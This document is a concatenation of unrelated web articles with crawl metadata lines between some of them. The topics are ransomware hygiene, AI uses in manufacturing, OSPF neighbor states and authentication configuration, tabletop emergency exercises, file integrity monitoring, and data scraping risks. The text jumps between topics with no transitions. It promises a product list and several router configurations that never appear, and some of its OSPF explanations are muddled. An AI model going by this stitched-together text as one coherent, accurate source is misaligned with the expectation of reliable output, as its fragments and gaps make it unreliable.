Don’t sacrifice your security for convenience. Carson Inc. has been helping its customers fight the battle against cyber threats for more than 22 years. Our team consists of Information Assurance (IA) experts with advanced degrees and technical certifications, including CISSP, CISA, LPT, GWASP, and ISO 27001. Our staff has in-depth knowledge of IT security statutory and regulatory guidance. | <urn:uuid:60c6438e-260d-436f-9b0c-88207a9e8e9a> | CC-MAIN-2022-40 | https://www.carson-saint.com/2015/03/18/2015-5-7-the-benefits-and-vulnerabilities-of-embedded-devices/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00394.warc.gz | en | 0.937772 | 593 | 2.5625 | 3 |
Ransomware attacks have increased in popularity, and many outlets predict that ransomware will be a $1 billion business this year. Ransomware is a form of malware that either locks users’ screens or encrypts users’ data, demanding that ransom be paid for the return of control or for decryption keys. Needless to say, paying the ransom only emboldens the perpetrators and perpetuates the ransomware problem.
Ransomware is not just a home user problem, in fact many businesses and government agencies have been hit. Healthcare facilities have been victims. Even police departments have been attacked and lost valuable data. As one might expect, protecting against ransomware has become a top priority for CIOs and CISOs in both the public and private sectors.
Much of the cybersecurity industry has, in recent years, shifted focus to detection and response rather than prevention. However, in the case of ransomware, detection is pretty easy because the malware announces its presence as soon as it has compromised a device. That leaves the user to deal with the aftermath. Once infected, the choices are to:
- pay the ransom and hope that malefactors return control or send decryption keys (not recommended, and it doesn’t always work that way)
- wipe the machine and restore data from backup
Restoration is sometimes problematic if users or organizations haven’t been keeping up with backups. Even if backups are readily available, time will be lost in cleaning up the compromised computer and restoring the data. Thus, preventing ransomware infections is preferred. However, no anti-malware product is 100% effective at prevention. It is still necessary to have good, tested backup/restore processes for cases where anti-malware fails.
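Because recovery hinges on backups actually being usable, it is worth automating at least a basic check that they are fresh and intact. The sketch below is a hypothetical example - the manifest format, paths and age threshold are assumptions - but it shows the kind of routine verification that makes "restore from backup" a realistic answer to ransomware.

```python
# Minimal backup sanity check: flag stale backups and checksum mismatches.
# The manifest format, file paths and age threshold are hypothetical.
import hashlib, json, os, time

MAX_AGE_DAYS = 7

def sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

with open("backup_manifest.json") as f:  # {"files": {"<path>": "<expected sha256>", ...}}
    manifest = json.load(f)

for path, expected in manifest["files"].items():
    age_days = (time.time() - os.path.getmtime(path)) / 86400
    if age_days > MAX_AGE_DAYS:
        print(f"STALE: {path} is {age_days:.0f} days old")
    if sha256(path) != expected:
        print(f"CORRUPT: {path} no longer matches its recorded checksum")
```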
Most ransomware attacks arrive as weaponized Office docs via phishing campaigns. Disabling macros can help, but this is not universally effective since many users need to use legitimate macros. Less commonly, ransomware can also come from drive-by downloads and malvertising.
Most endpoint security products have anti-malware capabilities, and many of these can detect and block ransomware payloads before they execute. All end-user computers should have anti-malware endpoint security clients installed, preferably with up-to-date subscriptions. Servers and virtual desktops should be protected as well. Windows platforms are still the most vulnerable, though there are increasing amounts of ransomware for Android. It is important to remember that Apple’s iOS and Mac devices are not immune from ransomware, or malware in general.
If you or your organization do not have anti-malware packages installed, there are some no-cost anti-ransomware specialty products available. They do not appear to be limited-time trial versions, but are instead fully functional. Always check with your organization’s IT management staff and procedures before downloading and installing software. All the products below are designed for Windows desktops:
The links, in alphabetical order by company name, are provided as resources for consideration for the readers rather than recommendations.
Ransomware hygiene encompasses the following short-list of best practices:
- Perform data backups
- Disable Office macros by default if feasible
- Deliver user training to avoid phishing schemes
- Use anti-malware
- Develop breach response procedures
- Don’t pay ransom
According to research published in the Annual Manufacturing Report 2018, 92% of senior executives in manufacturing acknowledge the potential of AI in manufacturing: it would not only enhance their productivity but also make their workforce smarter.
There is a significant gap between the amount of research into AI innovations for manufacturing and the minuscule level of implementation. This gap reflects a lack of awareness of the opportunity AI has to offer.
How can AI in manufacturing be beneficial?
- Predictive Maintenance
- Predicting Possible failure modes
- Quality Checks
- Environmental Impact
- Digital Replica
- Generative Design
- Customer Service
- Robotics
- Price Forecasts
- Leveraging Data
Prominent Use Cases for AI in Manufacturing
AI has been a game-changer on multiple fronts, and its capacity to transform manufacturing processes through AI-backed tools has been a key driver of growth. Let's look more closely at some prominent areas where artificial intelligence is driving success for manufacturers.
1) Predictive Maintenance
Every machine that operates continuously requires maintenance at some point, and predicting when to perform preventive maintenance can be both tiring and costly.
Through predictive maintenance, manufacturing companies can prevent unplanned machine downtime. An ecosystem of advanced sensors integrated with the manufacturing machinery provides the data needed to optimise the overall manufacturing process.
2) Predicting Possible Failure Modes
Our assumptions about a given part can overshadow possible failures. Failures take many forms, some far removed from what we can visually imagine: an imperfect part may perform perfectly, while a seemingly perfect part can fail disastrously.
AI-backed analysis of rich operational data can identify possible failure modes, ensuring that perceptions of a part and its performance do not lead to operational failures, and companies can quickly pinpoint the areas they need to focus on.
3) Quality Checks
Quality control is one of the most crucial factors that can drive, or drag down, a company's growth. Some flaws are too minute to be detected even by an expert human eye. Machine-learning-backed camera vision can segregate products with certain imperfections so that a human expert can then inspect them further.
In some cases the complete process can be fully automated, removing even the slightest human intervention. Adopting an AI-backed manufacturing process helps ensure that top-quality commitments are met.
4) Environmental Impact
Anything we manufacture, assemble or produce leaves an environmental footprint: natural resources are consumed to create the final product, often at the cost of harming the environment. Cutting plastic consumption and e-waste has become a necessity rather than an option.
AI can significantly reduce waste in the manufacture of certain products, and to a certain extent it can even help reverse the environmental damage done over the years by supporting the development and optimisation of more eco-friendly, sustainable materials.
5) Digital Replica
A digital replica, often called a digital twin, is a virtual representation of a product, service or factory. Through sensors and data-collection devices, one can create a digital replica of the physical model by integrating and connecting the data from all sensors and manufacturing instruments.
This enables real-time analysis based on the physical items, with the complete framework of components connected to a cloud-based platform. The technology can help brands in many different areas.
6) Generative Design
Designing objects is no longer a hassle. Generative design offers multiple outputs that adhere to specified criteria and parameters: feed in requirements such as material, cost constraints and manufacturing process, and you are free to choose from multiple alternatives.
The outputs are generated by machine-learning analytics, which indicate which designs comply most efficiently with the parameters and which ones fail. The algorithm finds multiple ways in which a product could be designed and produced, and it also opens up prospects for multi-functional design alternatives.
7) Customer Service
Customer service is an aspect often neglected in the manufacturing sector; however, this is a grave mistake through which business leaders lose significant business. AI-backed solutions, by contrast, are invaluable for predicting consumer expectations.
These solutions can flag critical issues right away, leading to a better, more personalised experience for consumers. Incorporating AI in manufacturing strengthens consumer engagement and creates better growth opportunities.
8) Robotics
We shouldn't be surprised if manpower in industry is soon overtaken by robots. Conventional robots, however, need to be programmed for the functions they must perform and are tied to a fixed path of action.
AI-powered robots, on the other hand, no longer need to be programmed for each task. They can interpret CAD models directly, removing the need for much of the human interaction.
9) Price Forecasts
Manufacturing requires a constant supply of raw materials. Price fluctuations in these resources can disrupt balance sheets and dent profits, and such instability in resource prices can leave commitments on end-product pricing shaky.
A data-driven AI algorithm can help mitigate this issue by notifying business leaders of the most accurate time to stock up on resources. Dynamic algorithms fed with multifaceted data can help predict prices and the resulting profit margins.
10) Leveraging Data
Manufacturers collect an immense amount of data during processing, operations and manufacturing, even if its usefulness initially seems quite general. When this big data is fed into advanced analytics algorithms, it yields valuable insights for business growth.
Including AI in manufacturing significantly impacts areas such as risk management, supply chain management, product quality, sales-volume prediction and the minimisation of recall issues. These AI-based applications can open up new and better prospects for business growth.
Final Words: The Future of Manufacturing
Artificial intelligence is a revolutionary technology in virtually every industry. Continuous development and falling operating costs have made it accessible to a wide range of companies, and the manufacturing sector has always been looking for system upgrades that are more efficient and cheaper.
AI in manufacturing supports industry success through efficient, data-driven decisions. Business leaders can minimise operational costs by optimising manufacturing processes, ultimately delivering better service to their customers.
Routers on the same network segment are called neighbors. Two routers can become neighbors only if they agree on the subnet, area ID, hello and dead intervals, and authentication settings. The neighbor process begins with hello packets, which are sent periodically out of every OSPF-enabled interface using IP multicast. Routers become neighbors as soon as they see themselves listed in a neighbor's hello packet, which confirms two-way communication. This section will help you understand how to configure and verify the OSPF neighbor relationship and authentication.
OSPF encapsulates its five message types directly inside IP packets using IP protocol 89. The packets are categorized as hello, database description (DBD or DD), link-state request (LSR), link-state update (LSU) and link-state acknowledgement (LSAck). When a data link first comes up, OSPF routers become neighbors as a first step using hello messages; they then exchange topology information with the help of the other four OSPF message types. Each OSPF router keeps a state machine for every neighbor and lists the current neighbor state in the output of the show ip ospf neighbor command. The neighbor state changes as the neighbors progress through their message exchange, and once the neighbors settle into the Full state the process is complete.
OSPF routers go through a series of adjacency states while building the relationship. Some of those states are transitory and reflect different stages of building the adjacency, while others are stable states in which, in the absence of topological changes, the routers can remain indefinitely. Knowing the neighbor states is important for understanding how OSPF adjacencies are built and for troubleshooting them.
Down is the initial state of a neighbor. It is most often seen when a working adjacency with a neighbor has been torn down, or when a manually configured neighbor does not respond to the initial hello packets. Having a neighbor in the Down state implies that the router already knows that neighbor's IP address.
Attempt is a valid state only on non-broadcast multi-access (NBMA) and point-to-point non-broadcast networks. On these networks a manually configured neighbor is immediately placed into the Attempt state and contacted with hello packets sent at the usual interval. If the neighbor does not respond within the dead interval, it is placed back into the Down state and contacted at a reduced rate.
A neighbor is placed into the Init state when valid hello packets have been received from it, but the list of seen routers in those hellos does not yet contain the receiving router's RID. In other words, the router can hear the other router but is not yet certain that the other router can hear it.
The 2-Way state means that a router has seen its own router ID in the neighbor field of a neighbor's hello packet, so bidirectional communication has been established. When a hello is received, the router updates the neighbor's dead timer, or adds the neighbor if it is not yet known, and moves on to the next step. On multi-access networks, neighbors must be in this state or higher to be eligible for election as the DR or BDR; two routers that are neither DR nor BDR on the segment form a neighbor relationship and remain in this state.
In the Exstart state, the master/slave relationship is negotiated; the router with the higher router ID becomes the master and sends its information to the slave first.
In the Exchange state, the routers describe their entire link-state databases using database description (DBD) packets. At this stage, packets may also be flooded out of the router's other interfaces.
In the Loading state, the routers fill in the missing pieces of the database and store the learned information in memory. The slave sends LSRs and the master replies with LSUs; in the same way, the master requests missing information with LSRs and the slave replies with LSUs. Through this process the neighbors become synchronized.
In the Full state, the neighbors are synchronized and the SPF algorithm is run to calculate the shortest paths. The neighbors are fully adjacent, and the adjacencies appear in the router and network LSAs. At this point the routing tables are calculated, or recalculated if an adjacency was reset.
Before getting into the configuration of OSPF neighbor relationships and authentication, it is important to understand a few OSPF terms.
The router ID (RID) identifies the router within an OSPF domain. Before an OSPF router sends any OSPF message, it must choose a unique 32-bit identifier known as the router ID. On Cisco routers, a manually configured router ID takes precedence. If no router ID is configured manually and a loopback interface exists, the highest loopback IP address becomes the router ID; if no loopback interface exists, the highest IP address on an active physical interface is used. If the interface whose address was chosen later fails or is deleted, the RID becomes unreachable, but OSPF continues to use the RID it learned; the interface from which the RID is taken does not have to be matched by an OSPF network command. If the RID is set with the router-id command, it remains unchanged as long as that command is in place. If the RID does change, the other routers in the same area must perform a new SPF calculation.
The hello protocol plays a major role in forming the neighbor relationship and performs several functions in OSPF. It discovers OSPF-speaking neighbors, and hello packets act as keepalives between neighbors. It also advertises several parameters on which two routers must agree before they can become neighbors. OSPF-speaking routers periodically send hello packets out of every OSPF-enabled interface; this period is called the hello interval. On Cisco routers, hello messages are sent every 10 seconds on point-to-point and broadcast networks, and every 30 seconds on NBMA networks. Every shared segment must have a DR and BDR to prevent unnecessary LSA flooding. If one or more neighbors on the subnet list their own interface address in the BDR field, the neighbor with the higher priority becomes the BDR; if there is a tie, the highest router ID wins.
OSPF can be configured in two ways:
1. With the ip ospf <process-id> area <area-id> command under the desired interface (supported only by newer IOS versions)
2. With the network command under the OSPF routing process
In the configurations below, two of the routers are configured using the second method and the other two using the first method.
Configuration for R1 as follows:
Configuration for R5 as follows:
Configuration for R4 as follows:
Configuration for R3 as follows:
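The device configurations themselves were not preserved in this copy of the article, so the following is only a representative sketch. It assumes OSPF process 1, area 0, hypothetical 10.0.x.0/24 links and GigabitEthernet interface names. A router configured with the network command (the second method) would look something like this:

router ospf 1
 ! advertise any interface whose address falls in these ranges into area 0
 network 10.0.12.0 0.0.0.255 area 0
 network 10.0.15.0 0.0.0.255 area 0

A router using the newer per-interface command (the first method) would look something like this:

interface GigabitEthernet0/0
 ip address 10.0.34.4 255.255.255.0
 ! enable OSPF process 1 on this interface and place it in area 0
 ip ospf 1 area 0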
Use the show ip route command to confirm the three OSPF routes on each router.
End-to-end pings should be successful.
OSPF can authenticate every OSPF message. This is usually done to prevent a rogue router from injecting false routing information and thereby causing a denial of service. OSPF supports three types of authentication:
Null authentication
Plain text (clear text) authentication
MD5 authentication
OSPF authentication is fairly straightforward and easy to configure. When configuring a password, avoid entering the encryption type for the password on the interface; instead, use the global service password-encryption command to enable password protection once the entire configuration is complete. Null authentication, also known as type 0, means that no authentication information is included in the packet header; it is the default. Plain text authentication, known as type 1, uses a simple clear-text password. MD5 authentication, known as type 2, uses MD5 cryptographic hashes of the password. Authentication does not have to be enabled, but if it is, all peer routers on the same segment must use the same password and the same authentication method. The following network example is used to look at the plain text and MD5 authentication types.
Plain text authentication is typically used when the devices within the area do not support the more secure MD5 authentication. This type of authentication leaves the internetwork vulnerable to sniffer attacks, in which packets are captured by a protocol analyzer and the password can simply be read. It is mainly useful when performing a reconfiguration rather than for security; for example, separate passwords can be used on newer and older OSPF routers that share a common broadcast network, to keep them from talking to one another. Plain text passwords do not have to be the same throughout an area, but they must be the same between neighbors.
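The original configuration example did not survive in this copy, so here is a minimal sketch of area-wide plain text authentication. The process number, area, interface name and password are hypothetical (a plain text key is limited to eight characters):

router ospf 1
 ! enable type 1 (plain text) authentication for all interfaces in area 0
 area 0 authentication
!
interface GigabitEthernet0/0
 ! the password itself is set per interface and must match the neighbor's
 ip ospf authentication-key cisco123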
The area authentication command in the above configuration enables authentication on all of the router's interfaces in the specified area. The ip ospf authentication command can also be used under an interface to configure plain text authentication for that interface alone. This per-interface command can be used when no authentication, or a different authentication method, is configured for the area the interface belongs to; it overrides the authentication configured for that area, which is useful when different interfaces belonging to the same area need to use different authentication methods.
MD5 authentication offers higher security than plain text authentication. It uses the MD5 algorithm to compute a hash value from the contents of the OSPF packet and the password. The hash value is transmitted in the packet along with a key ID and a non-decreasing sequence number. The receiver, which knows the same password, calculates its own hash value; provided nothing in the message has changed, the receiver's hash value must match the hash value the sender transmitted with the message.
Cisco recommends using the service password-encryption command on all routers. It causes the router to encrypt passwords in any display of the configuration file, which guards against passwords being learned from a text copy of the router configuration.
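Again, the original example configuration is missing here; a sketch of MD5 authentication under the same assumptions (process 1, area 0, hypothetical interface and key) might look like this:

service password-encryption
!
router ospf 1
 ! enable type 2 (MD5) authentication for all interfaces in area 0
 area 0 authentication message-digest
!
interface GigabitEthernet0/0
 ! key ID 1 and the MD5 password; both must match on the neighbor
 ip ospf message-digest-key 1 md5 cisco123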
The area authentication message-digest command used in this configuration enables MD5 authentication on all of the router's interfaces in the specified area. The ip ospf authentication message-digest command can likewise be used under an interface to configure MD5 authentication for that particular interface. It applies when no authentication, or a different authentication method, is configured for the area, and it is most useful when different interfaces that belong to the same area need to use different authentication methods.
After any configuration or authentication change, it is essential to verify the result with the relevant show commands.
Use the command show ip ospf interface to view the authentication configured for the interfaces.
The show ip ospf neighbor command displays the neighbor table, which contains the details of each neighbor.
The command show ip route will display the routing table.
OSPF authentication gives you the flexibility to authenticate OSPF neighbors so that routing updates are exchanged securely. This section covered the neighbor states involved in forming an OSPF adjacency, showed how to configure and verify the OSPF neighbor relationship and authentication, and discussed the different OSPF authentication methods.
Preparing your organization for the unknown requires significant planning, forethought, and an organized effort to identify potential threats and take proactive steps to minimize risks. For many businesses, this type of focused preparation starts with creating an emergency plan. Over time, organizations may develop a more comprehensive business continuity plan for different scenarios—each intended to document and provide detailed instructions concerning how the organization will respond if/when an emergency occurs.
But, how can you know whether your emergency response or business continuity plan is sufficient before you need to put it in action? Thankfully, tabletop exercises are a great tool that provides employee safety and business continuity leaders a low-cost but high-impact way of determining emergency preparedness before a crisis occurs.
What Is a Tabletop Exercise?
A tabletop exercise (TTX) is a simulated, interactive exercise that tests an organization’s emergency response procedures. The Federal Emergency Management Agency (FEMA) defines tabletop exercises as “an instrument to train for, assess, practice, and improve performance in prevention, protection, response, and recovery capabilities in a risk-free environment.” For example, the agency—which coordinates emergency response following federally-declared disasters—regularly leverages tabletop exercises to test and validate policies, plans, procedures, equipment, and more. FEMA also relies on tabletop exercises to clarify roles and responsibilities to ensure interagency coordination and improve communication.
In tabletop exercises, key personnel with emergency management roles and responsibilities gather together to discuss various simulated emergency situations. Because the environment of a TTX is non-threatening (i.e., a “real” emergency is not happening), exercise participants can calmly rehearse their roles, ask questions, and troubleshoot problem areas.
How long should a tabletop exercise last?
A tabletop exercise’s duration depends on the scenario being rehearsed, the number of participants involved, and the objectives established ahead of time. Often they can be completed in as little as 2-4 hours; however, it is common for government agencies and large organizations to dedicate multiple days every quarter to testing response plans to large-scale scenarios.
What are the benefits of tabletop exercises?
Beyond providing a low-cost, low-risk, and highly effective way to assess emergency response plans before they are needed, well-designed tabletop exercises help individuals across the organization better understand their role in an emergency, providing a safe space to think critically about potential scenarios that could impact normal operations.
For safety and business continuity leaders, tabletop exercises also provide peace of mind and confidence that key personnel are adequately trained and prepared for critical events, which can drastically improve response times, potentially saving lives and protecting the business from significant losses.
Tabletop Exercises vs. Drills
Nearly every student and employee has experienced a fire drill, tornado drill, or some other scenario-based activity designed to improve situational awareness and coordinated response in the event of a disaster. These are typically activities meant to test a specific procedure or set of desired actions under a safety officer or other personnel’s direct supervision. A tabletop exercise is more than just a drill, however.
According to the Homeland Security Exercise Evaluation Program (HSEEP), a tabletop fits into four different types of exercises that organizations use to evaluate their emergency plans and procedures:
- Walkthroughs, workshops, or orientation seminars
- Tabletop exercises
- Functional exercises
- Full-scale exercises
Use a walkthrough for basic team training so they can begin to familiarize themselves with their roles and responsibilities. During a walkthrough, team members will come to understand the various emergency responses they can expect along with how the organization’s business continuity plans will unfold. Finally, a walkthrough is a useful time to make sure everyone understands the communication process.
As mentioned above, tabletop exercises are coordinated discussions in which team members talk about their roles during an emergency and how they might react in various scenarios. Most tabletop exercises use a facilitator to guide the discussion. Depending on the exercise's objectives and scope, they may require a few hours or multiple days.
A functional exercise enables emergency team members to perform their duties in a simulated environment. For this type of exercise, a scenario is given, such as a specific hazard or a critical business system’s failure. With a functional exercise, participants are seeking to “try out” particular procedures and resources.
You may have participated in a full-scale exercise as part of the military, municipal government job, or as an employee at a healthcare organization. With this type of exercise, the more “real” the experience can be for participants, the better. Ahead of full-scale exercises, local businesses, law enforcement agencies, and news organizations are typically notified and often given roles to play as well.
Tabletop Exercise Participants
When planning a tabletop exercise, it helps to let participants know what is expected of them. Below are the most common roles assigned to individuals in the room.
Tabletop exercises are not passive events. Participants should be willing to jump into the conversation as needed. Be pleasant—remember that everyone wants to find solutions for emergencies, and the best time to do that is while the “emergency” doesn’t exist! It’s also important that participants go with the flow and embrace the objectives of the scenario at hand. Perhaps you think that another scenario would be a better choice or feel your role is less vital to the discussion than others in the room. Instead of derailing the exercise, stay engaged and try to accept the limits of the chosen scenario. Speak up if your role confuses you or if something doesn’t make sense.
Facilitators should control the pace and flow of the exercise. They should nudge the discussion along if needed and look for participants who may hang back from expressing their thoughts. Focus on drawing out solutions from the group. Ask questions to encourage deeper thinking about potential issues that may be encountered.
Evaluators play an essential role in documenting the outcomes of the tabletop exercise, highlighting both positive actions taken during the scenario and areas for improvement. Evaluators are also often involved in developing the After Action Report (AAR), which details lessons learned and recommendations for future planning, training, and exercises.
A tabletop exercise observer is typically in the room to passively follow the proceedings and provide an additional perspective on topics that fall outside the participants' direct purview or expertise. If you invite observers, make sure they know they can answer questions or give feedback as appropriate when prompted by the larger group.
Pros and Cons of Tabletop Exercises
If it’s not evident already, we strongly recommend tabletop exercises and believe that—used effectively—they can dramatically improve any organization’s emergency preparedness and response plans. However, like most tools, they are a better fit for some jobs than others. Here are some of the most commonly cited advantages and disadvantages of tabletop exercises.
- Tabletop exercises are a low-cost yet highly effective method for evaluating emergency plans, responses, and roles in a stress-free environment.
- Tabletop exercise participants also find that the low-stress environment is a great way to calmly work out issues, clarify roles and responsibilities, and document best practices with a larger group’s collaboration.
- Given current technology, remote participants—including remote employees and external partners—can participate in tabletop exercises without the organization incurring excessive travel expenses or lost productivity.
Of course, not every method is perfect. Here are some drawbacks of tabletop exercises:
- Tabletop exercises can’t perfectly replicate the sense of urgency your team will experience in a real emergency, so they aren’t a true test of what your team can do operationally in the heat of the moment.
- Also, the somewhat formal structure of tabletop exercises may lull some participants into thinking emergency planning and emergency response are always simple and straightforward (which often is not the case).
- They won’t strain resources to the extent that an actual event or rehearsal would. For example, if a stairwell’s size would hinder an evacuation, this might be overlooked in a simple tabletop exercise.
Additional Considerations for Effective Tabletop Exercises
Condensed exercise time frame
Participants should expect that the exercise will proceed in a condensed time frame, so events will unfold rapidly—not necessarily how they would in the real world. Remind the team that a real emergency will require flexible time management skills. For instance, a slow-moving weather system may give the team days to prepare, but it can wreak havoc in mere minutes when the storm arrives.
Leaders should prepare detailed scenario information ahead of time with position-specific events to guide everyone through what they are supposed to do during the emergency. Make sure your team has access to this packet ahead of time. Consider leveraging a modern emergency communication solution with Event Pages to simulate a communication exercise during the tabletop.
Communicating with employees during emergencies
We recommend using a mass notification system such as AlertMedia to reach employees on any device through various channels. Options such as app push notifications, text, voice, email, and social media ensure maximum deliverability. Two-way messaging ensures employers can stay in touch with employees, even in emergency situations.
Stay on top of critical events as they happen
Of course, you’ll also need to document your processes for reporting emergencies, unplanned business disruptions, and other critical events. Combining analyst-verified threat intelligence with location data for your people, facilities, and assets will help you identify incidents faster and minimize response times as you implement your plans.
Tabletop exercises are a useful tool for emergency planners everywhere. With some preparation and foresight, this low-cost planning tool can help your organization better prepare for an emergency, communicate faster during critical events, and take action with confidence.
What Is File Integrity Monitoring?
FIM is a security technology that monitors and detects changes in files that could be indicative of a cyberattack.
“We are trying to make sure that files that should not be tampered with are not tampered with,” says Timothy Brown, vice president of security at IT management solutions company SolarWinds. “FIM is used not just for single files but for systems and applications. We define an initial state and then look to see if anything is different.”
Where other cyberdefenses may detect aberrant behaviors in a system, FIM looks at the systems themselves. “Basically, it’s a verification method,” says Shawn McCarthy, research director at IDC Government Insights. “It compares the current state of a file to a previously measured baseline.”
Why focus on change as a marker of potential threat? Because virtually every cyber exploit will seek to alter key system elements, including Windows registry, drivers, installed software and applications. “Most breaches don’t take place without having some kind of change to these elements,” says Gartner Principal Analyst Mitchell Schneider. “The sooner you can detect these signs of compromise, the faster you are able to respond.”
Ideally, FIM will be configured to pay special attention to the most sensitive functions and files. In federal government, this means watching for alterations in any systems that may handle personally identifiable information.
“Does it have a driver’s license or Social Security numbers? If so, there will be restrictions for which users can access that file, who is entitled to open it, who has access to modify it, and who has the ability to copy it or use it; for example by attaching it to an email,” says Morey Haber, CTO and CISO at BeyondTrust.
By keeping a constant check on the integrity of such files, “FIM raises up the policy level, enabling you to control access on a data-centric model,” Haber says.
How Does File Integrity Monitoring Work?
When FIM notices an unanticipated file change, it sends an alert to the administrators. The art here lies in defining the parameters in order to not be deluged by false positives. Rather than raise a flag every time a comma gets changed, FIM should be configured to look for deep system changes, especially tweaks to functions and processes that ought to be left alone.
“There are certain baselines that never change, like the operating system file: It came with the operating system, and it should never be altered until a patch comes out. A policy document should never change unless it’s an approved change,” Brown says.
If a file suddenly becomes encrypted, or executable files are altered, those actions should set alarm bells ringing.
“When we talk about FIM we’re talking about not just the content of the file but the attributes of the file — read, write, execute. FIM is looking at key settings that could be used to make an application work or make it vulnerable,” Haber says.
For changes at the system level, the IT shop should have a change management process in place to authorize and validate changes that are legitimate and necessary. FIM is looking for alterations that take place outside those parameters. “What you want is an alert when something happens that is not part of the normal runtime. A common case on a Linux box would be the host file and the password file: No one is supposed to modify those,” Haber says.
In addition to issuing alerts, FIM can be configured to drive automated response. It generally won’t remediate potential threats — those go to human operators for review — but it can weed out the false positives. For example, it can compare a change with a whitelist of approved changes, such as scheduled patches. This helps ensure the IT team sees only those alerts that represent true potential threats.
“It’s checking changes against what is happening according to plan, and only warning the analysts when something falls outside that existing loop of planned or accepted changes,” Schneider says.
What Are Baseline Comparison and Real-Time Change Notifications?
Two key concepts in FIM are the baseline comparison and real-time change notification. Essentially, these represent two different ways of implementing FIM that can be used separately or in tandem. Each approach can yield valuable insights, although the real-time strategy will, as the name suggests, offer more opportunity for timely response.
A baseline comparison starts with a snapshot or template that depicts the system in its optimal, initial state. “It’s basically like an image of your system,” McCarthy says. A subsequent scheduled review looks for variations from that initial state. “The software can notify system managers if a discrepancy is found. Some tools may allow different levels of notification, depending on what is found and where it occurs, such as whether the change is detected in individual files, operating systems or access control.”
Real-time notification on the other hand tracks changes as they occur. “It looks at the operating system and records the activity: Someone read this file, someone rewrote this file,” Brown says.
Real-time notification may seem like the obvious choice. If you know what’s happening as soon as it happens, you’re obviously in a better position to take timely action. But there are limitations to real-time scanning that can tilt the balance in favor of a baseline approach. If files are extraordinarily large, for example, or if users need superfast access to systems, the real-time review can slow down the works. In such cases, Haber says, a baseline comparison may be preferable.
When real-time notification is available, though, it can deliver powerful capabilities. “Doing it in real time allows you to block the change,” Haber says. “It gives you more of the protective capability, versus baseline, which has no defensive or blocking capability.”
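To make the two approaches concrete, here is a minimal command-line sketch for a Linux host. The monitored directory, baseline path and tooling (sha256sum, plus inotifywait from the inotify-tools package) are assumptions; a production FIM product adds policy, tamper-proof storage of the baseline and alert routing on top of this basic idea.

# Build the baseline once, and store it where the monitored host cannot alter it
find /etc -type f -exec sha256sum {} + > /var/fim/baseline.sha256

# Later, compare the current state against the baseline; only mismatches are printed
sha256sum --quiet -c /var/fim/baseline.sha256

# Real-time change notification: watch the tree for writes, creations,
# deletions and permission changes as they happen
inotifywait -m -r -e modify,create,delete,attrib /etc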
How Can File Integrity Monitoring Benefit Federal Agencies?
Feds need FIM for regulatory compliance, as noted. In addition, given the particular nature of the federal IT infrastructure, FIM can be a powerful addition to an existing cybersuite.
Government IT is heavy with legacy and idiosyncratic systems, many of which may carry undocumented cyberweaknesses.
“There are still a lot of those things in place, and government needs a way to make sure a vulnerability has not taken hold in one of those systems,” Brown says. “Typically, the exploit will act in a certain way: It will put something in the registry or change a file system. FIM allows you to identify those changes, which in turn shows you whether a vulnerability has been exploited.”
Moreover, FIM can be fine-tuned to give special priority to high-value assets, such as those containing personal information. “Sensitivity of data is the first concern on the federal side,” Haber says. “FIM can detect whether a file has sensitive information on it and can help with change control by ensuring that changes to files are done appropriately, and by helping to prevent any inappropriate changes.”
Such capabilities can make FIM an especially attractive solution to those charged with safeguarding government systems. | <urn:uuid:f07fff7f-8653-4f58-b1bd-be693c47d017> | CC-MAIN-2022-40 | https://fedtechmagazine.com/article/2019/10/how-file-integrity-monitoring-can-help-feds-improve-cybersecurity-perfcon | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00594.warc.gz | en | 0.935541 | 1,536 | 2.859375 | 3 |
There has been a lot said about data scraping. Here is a breakdown of what it is, why it might be problematic and how we might deal with it going forward.
For a recent example of abusive data scraping, we do not have to go too far back in time: in April 2021, researchers discovered a database containing the personal details of more than 500 million Facebook users circulating on hacker forums. Not much later, similar news reports surfaced about a LinkedIn data leak. Analysis of both incidents showed that the hackers did not even need to attack the servers of the social media platforms to get hold of the data. They made use of a handy trick called "data scraping". How does this technique work, and how big is the danger of data scraping for Internet users?
Data scraping is essentially a way of transferring data from one system to another. But it differs from more conventional data transfer methods. The main difference is in the output. The scraped data does not serve as input for another computer program, but is intended for display to the end user. Data scraping is therefore a very crude technique that will only be used when there is no other way to extract data from a system, such as an operating system that is no longer compatible with modern hardware. The output is often very unstructured because things like formatting, binary data and other additional information are not transferred. This can even cause programs to crash during data scraping.
There are different technical variants within data scraping. The oldest form is screen scraping. With screen scraping, a special tool is connected to an obsolete computer system. The scraping tool pretends to be a user and simulates the key commands to navigate through the system interface. The tool then extracts the data from the system and passes it on to the new system. This method of working inspired more modern automation tools that work on the same basis.
In addition to screen scraping, there is also web scraping, which is used to extract data from web pages. The principle is more or less the same. Again, you usually need a scraping tool to make the web page believe that you are a web administrator who is going to modify the page. Most websites today have built-in security algorithms to detect such tools and deny them access. So large-scale scraping incidents like those at Facebook are really very rare – at least as far as we know so far.
Data scraping is not in itself an illegal practice. Recognised cloud providers such as Amazon AWS offer secure web scraping tools in the form of free APIs. Like any computer program, data scraping only becomes dangerous when the tools fall into the wrong hands. As happened at Facebook, to refer back to that incident.
In the Facebook incident, the scraped database did contain personal data such as phone numbers and email addresses. If cybercriminals get hold of this data, they can use it for phishing and other types of fraud. Data scraping is initially far less intrusive than hacking into someone's account, and you will probably not be directly affected by a scraping attack, but in the long run it can make you more vulnerable to phishing. The recent LinkedIn scraping incident seems less intrusive and exposed less interesting data; however, every kind of data can be interesting to a cybercriminal or hacker. Scraped data can open the door to spear phishing attacks: hackers can learn the names of superiors, ongoing projects, trusted companies or organizations, and so on. Essentially, everything a hacker could need to craft a plausible message and provoke the desired response in their victims.
As a user of a website, there is basically not much you can do against a scraping attack, except carefully manage what information you share about yourself on that website. With Facebook as an example, do a regular privacy check to find out what you actually share. Ultimately, the responsibility lies in what you share yourself, and that is not always easy, as the problems we see these days make clear. Also bear in mind that the effects of someone accessing your personal information might not manifest for a long time. By the time someone abuses your data, you might already have forgotten that you ever shared it with the network.
